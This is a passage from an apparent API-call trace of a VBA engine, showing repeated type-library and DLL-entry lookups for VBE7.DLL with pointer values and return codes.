pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000) returned 0x0 [0069.539] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144b00, pIndex=0x0 | out: ppTLib=0x144b00*=0x665ba50, pIndex=0x0) returned 0x0 [0069.539] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144b10, pDummy=0x0 | out: ppTLibAttr=0x144b10, pDummy=0x0) returned 0x0 [0069.539] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.539] IUnknown:Release (This=0x665ba50) returned 0xd [0069.539] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144b00, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.539] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144b00, pbstrName=0x0, pwOrdinal=0x144b20 | out: pBstrDllName=0x144b00*=0x0, pbstrName=0x0, pwOrdinal=0x144b20*=0x4d90) returned 0x0 [0069.539] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000) returned 0x0 [0069.539] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143bf0, pIndex=0x0 | out: ppTLib=0x143bf0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.539] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143c00, pDummy=0x0 | out: ppTLibAttr=0x143c00, pDummy=0x0) returned 0x0 [0069.539] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.539] IUnknown:Release (This=0x665ba50) returned 0xd [0069.539] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143bf0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.540] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143bf0, pbstrName=0x0, pwOrdinal=0x143c10 | out: pBstrDllName=0x143bf0*=0x0, pbstrName=0x0, pwOrdinal=0x143c10*=0x3e80) returned 0x0 [0069.540] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000) returned 0x0 [0069.540] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143df0, pIndex=0x0 | out: ppTLib=0x143df0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.540] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143e00, pDummy=0x0 | out: ppTLibAttr=0x143e00, pDummy=0x0) returned 0x0 [0069.540] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.540] IUnknown:Release (This=0x665ba50) returned 0xd [0069.540] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143df0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.540] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143df0, pbstrName=0x0, pwOrdinal=0x143e10 | out: pBstrDllName=0x143df0*=0x0, pbstrName=0x0, pwOrdinal=0x143e10*=0x4080) returned 0x0 [0069.540] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000) returned 0x0 [0069.540] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1442b0, pIndex=0x0 | out: ppTLib=0x1442b0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.540] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1442c0, pDummy=0x0 | out: ppTLibAttr=0x1442c0, pDummy=0x0) returned 0x0 [0069.540] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.540] IUnknown:Release (This=0x665ba50) returned 0xd [0069.540] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1442b0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.540] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1442b0, pbstrName=0x0, pwOrdinal=0x1442d0 | out: pBstrDllName=0x1442b0*=0x0, pbstrName=0x0, pwOrdinal=0x1442d0*=0x4540) returned 0x0 [0069.540] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000) returned 0x0 [0069.540] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144710, pIndex=0x0 | out: ppTLib=0x144710*=0x665ba50, pIndex=0x0) returned 0x0 [0069.540] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144720, pDummy=0x0 | out: ppTLibAttr=0x144720, pDummy=0x0) returned 0x0 [0069.540] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.540] IUnknown:Release (This=0x665ba50) returned 0xd [0069.540] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144710, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.541] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144710, pbstrName=0x0, pwOrdinal=0x144730 | out: pBstrDllName=0x144710*=0x0, pbstrName=0x0, pwOrdinal=0x144730*=0x49a0) returned 0x0 [0069.541] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000) returned 0x0 [0069.541] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144b00, pIndex=0x0 | out: ppTLib=0x144b00*=0x665ba50, pIndex=0x0) returned 0x0 [0069.541] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144b10, pDummy=0x0 | out: ppTLibAttr=0x144b10, pDummy=0x0) returned 0x0 [0069.541] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.541] IUnknown:Release (This=0x665ba50) returned 0xd [0069.541] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144b00, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.541] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144b00, pbstrName=0x0, pwOrdinal=0x144b20 | out: pBstrDllName=0x144b00*=0x0, pbstrName=0x0, pwOrdinal=0x144b20*=0x4d90) returned 0x0 [0069.541] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000) returned 0x0 [0069.541] IMalloc:Realloc (This=0x7fefec05380, pv=0xafbaf80, cb=0x2810) returned 0xafbaf80 [0069.541] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143bf0, pIndex=0x0 | out: ppTLib=0x143bf0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.541] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143c00, pDummy=0x0 | out: ppTLibAttr=0x143c00, pDummy=0x0) returned 0x0 [0069.541] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.541] IUnknown:Release (This=0x665ba50) returned 0xd [0069.541] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143bf0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.541] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143bf0, pbstrName=0x0, pwOrdinal=0x143c10 | out: pBstrDllName=0x143bf0*=0x0, pbstrName=0x0, pwOrdinal=0x143c10*=0x3e80) returned 0x0 [0069.541] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000) returned 0x0 [0069.541] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143df0, pIndex=0x0 | out: ppTLib=0x143df0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.541] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143e00, pDummy=0x0 | out: ppTLibAttr=0x143e00, pDummy=0x0) returned 0x0 [0069.542] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.542] IUnknown:Release (This=0x665ba50) returned 0xd [0069.542] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143df0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.542] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143df0, pbstrName=0x0, pwOrdinal=0x143e10 | out: pBstrDllName=0x143df0*=0x0, pbstrName=0x0, pwOrdinal=0x143e10*=0x4080) returned 0x0 [0069.542] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000) returned 0x0 [0069.542] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1442b0, pIndex=0x0 | out: ppTLib=0x1442b0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.542] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1442c0, pDummy=0x0 | out: ppTLibAttr=0x1442c0, pDummy=0x0) returned 0x0 [0069.542] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.542] IUnknown:Release (This=0x665ba50) returned 0xd [0069.542] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1442b0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.542] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1442b0, pbstrName=0x0, pwOrdinal=0x1442d0 | out: pBstrDllName=0x1442b0*=0x0, pbstrName=0x0, pwOrdinal=0x1442d0*=0x4540) returned 0x0 [0069.542] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000) returned 0x0 [0069.542] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144710, pIndex=0x0 | out: ppTLib=0x144710*=0x665ba50, pIndex=0x0) returned 0x0 [0069.542] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144720, pDummy=0x0 | out: ppTLibAttr=0x144720, pDummy=0x0) returned 0x0 [0069.542] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.542] IUnknown:Release (This=0x665ba50) returned 0xd [0069.542] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144710, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.542] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144710, pbstrName=0x0, pwOrdinal=0x144730 | out: pBstrDllName=0x144710*=0x0, pbstrName=0x0, pwOrdinal=0x144730*=0x49a0) returned 0x0 [0069.542] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000) returned 0x0 [0069.542] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144b00, pIndex=0x0 | out: ppTLib=0x144b00*=0x665ba50, pIndex=0x0) returned 0x0 [0069.543] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144b10, pDummy=0x0 | out: ppTLibAttr=0x144b10, pDummy=0x0) returned 0x0 [0069.543] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.543] IUnknown:Release (This=0x665ba50) returned 0xd [0069.543] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144b00, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.543] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144b00, pbstrName=0x0, pwOrdinal=0x144b20 | out: pBstrDllName=0x144b00*=0x0, pbstrName=0x0, pwOrdinal=0x144b20*=0x4d90) returned 0x0 [0069.543] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000) returned 0x0 [0069.543] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143bf0, pIndex=0x0 | out: ppTLib=0x143bf0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.543] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143c00, pDummy=0x0 | out: ppTLibAttr=0x143c00, pDummy=0x0) returned 0x0 [0069.543] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.543] IUnknown:Release (This=0x665ba50) returned 0xd [0069.543] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143bf0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.543] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143bf0, pbstrName=0x0, pwOrdinal=0x143c10 | out: pBstrDllName=0x143bf0*=0x0, pbstrName=0x0, pwOrdinal=0x143c10*=0x3e80) returned 0x0 [0069.543] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000) returned 0x0 [0069.543] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143df0, pIndex=0x0 | out: ppTLib=0x143df0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.543] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143e00, pDummy=0x0 | out: ppTLibAttr=0x143e00, pDummy=0x0) returned 0x0 [0069.543] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.543] IUnknown:Release (This=0x665ba50) returned 0xd [0069.543] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143df0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.543] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143df0, pbstrName=0x0, pwOrdinal=0x143e10 | out: pBstrDllName=0x143df0*=0x0, pbstrName=0x0, pwOrdinal=0x143e10*=0x4080) returned 0x0 [0069.543] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000) returned 0x0 [0069.543] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1442b0, pIndex=0x0 | out: ppTLib=0x1442b0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.544] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1442c0, pDummy=0x0 | out: ppTLibAttr=0x1442c0, pDummy=0x0) returned 0x0 [0069.544] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.544] IUnknown:Release (This=0x665ba50) returned 0xd [0069.544] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1442b0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.544] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1442b0, pbstrName=0x0, pwOrdinal=0x1442d0 | out: pBstrDllName=0x1442b0*=0x0, pbstrName=0x0, pwOrdinal=0x1442d0*=0x4540) returned 0x0 [0069.544] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000) returned 0x0 [0069.544] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144710, pIndex=0x0 | out: ppTLib=0x144710*=0x665ba50, pIndex=0x0) returned 0x0 [0069.544] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144720, pDummy=0x0 | out: ppTLibAttr=0x144720, pDummy=0x0) returned 0x0 [0069.544] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.544] IUnknown:Release (This=0x665ba50) returned 0xd [0069.544] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144710, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.544] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144710, pbstrName=0x0, pwOrdinal=0x144730 | out: pBstrDllName=0x144710*=0x0, pbstrName=0x0, pwOrdinal=0x144730*=0x49a0) returned 0x0 [0069.544] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000) returned 0x0 [0069.544] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144b00, pIndex=0x0 | out: ppTLib=0x144b00*=0x665ba50, pIndex=0x0) returned 0x0 [0069.544] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144b10, pDummy=0x0 | out: ppTLibAttr=0x144b10, pDummy=0x0) returned 0x0 [0069.544] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.544] IUnknown:Release (This=0x665ba50) returned 0xd [0069.544] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144b00, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.544] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144b00, pbstrName=0x0, pwOrdinal=0x144b20 | out: pBstrDllName=0x144b00*=0x0, pbstrName=0x0, pwOrdinal=0x144b20*=0x4d90) returned 0x0 [0069.545] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000) returned 0x0 [0069.545] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143bf0, pIndex=0x0 | out: ppTLib=0x143bf0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.545] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143c00, pDummy=0x0 | out: ppTLibAttr=0x143c00, pDummy=0x0) returned 0x0 [0069.545] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.545] IUnknown:Release 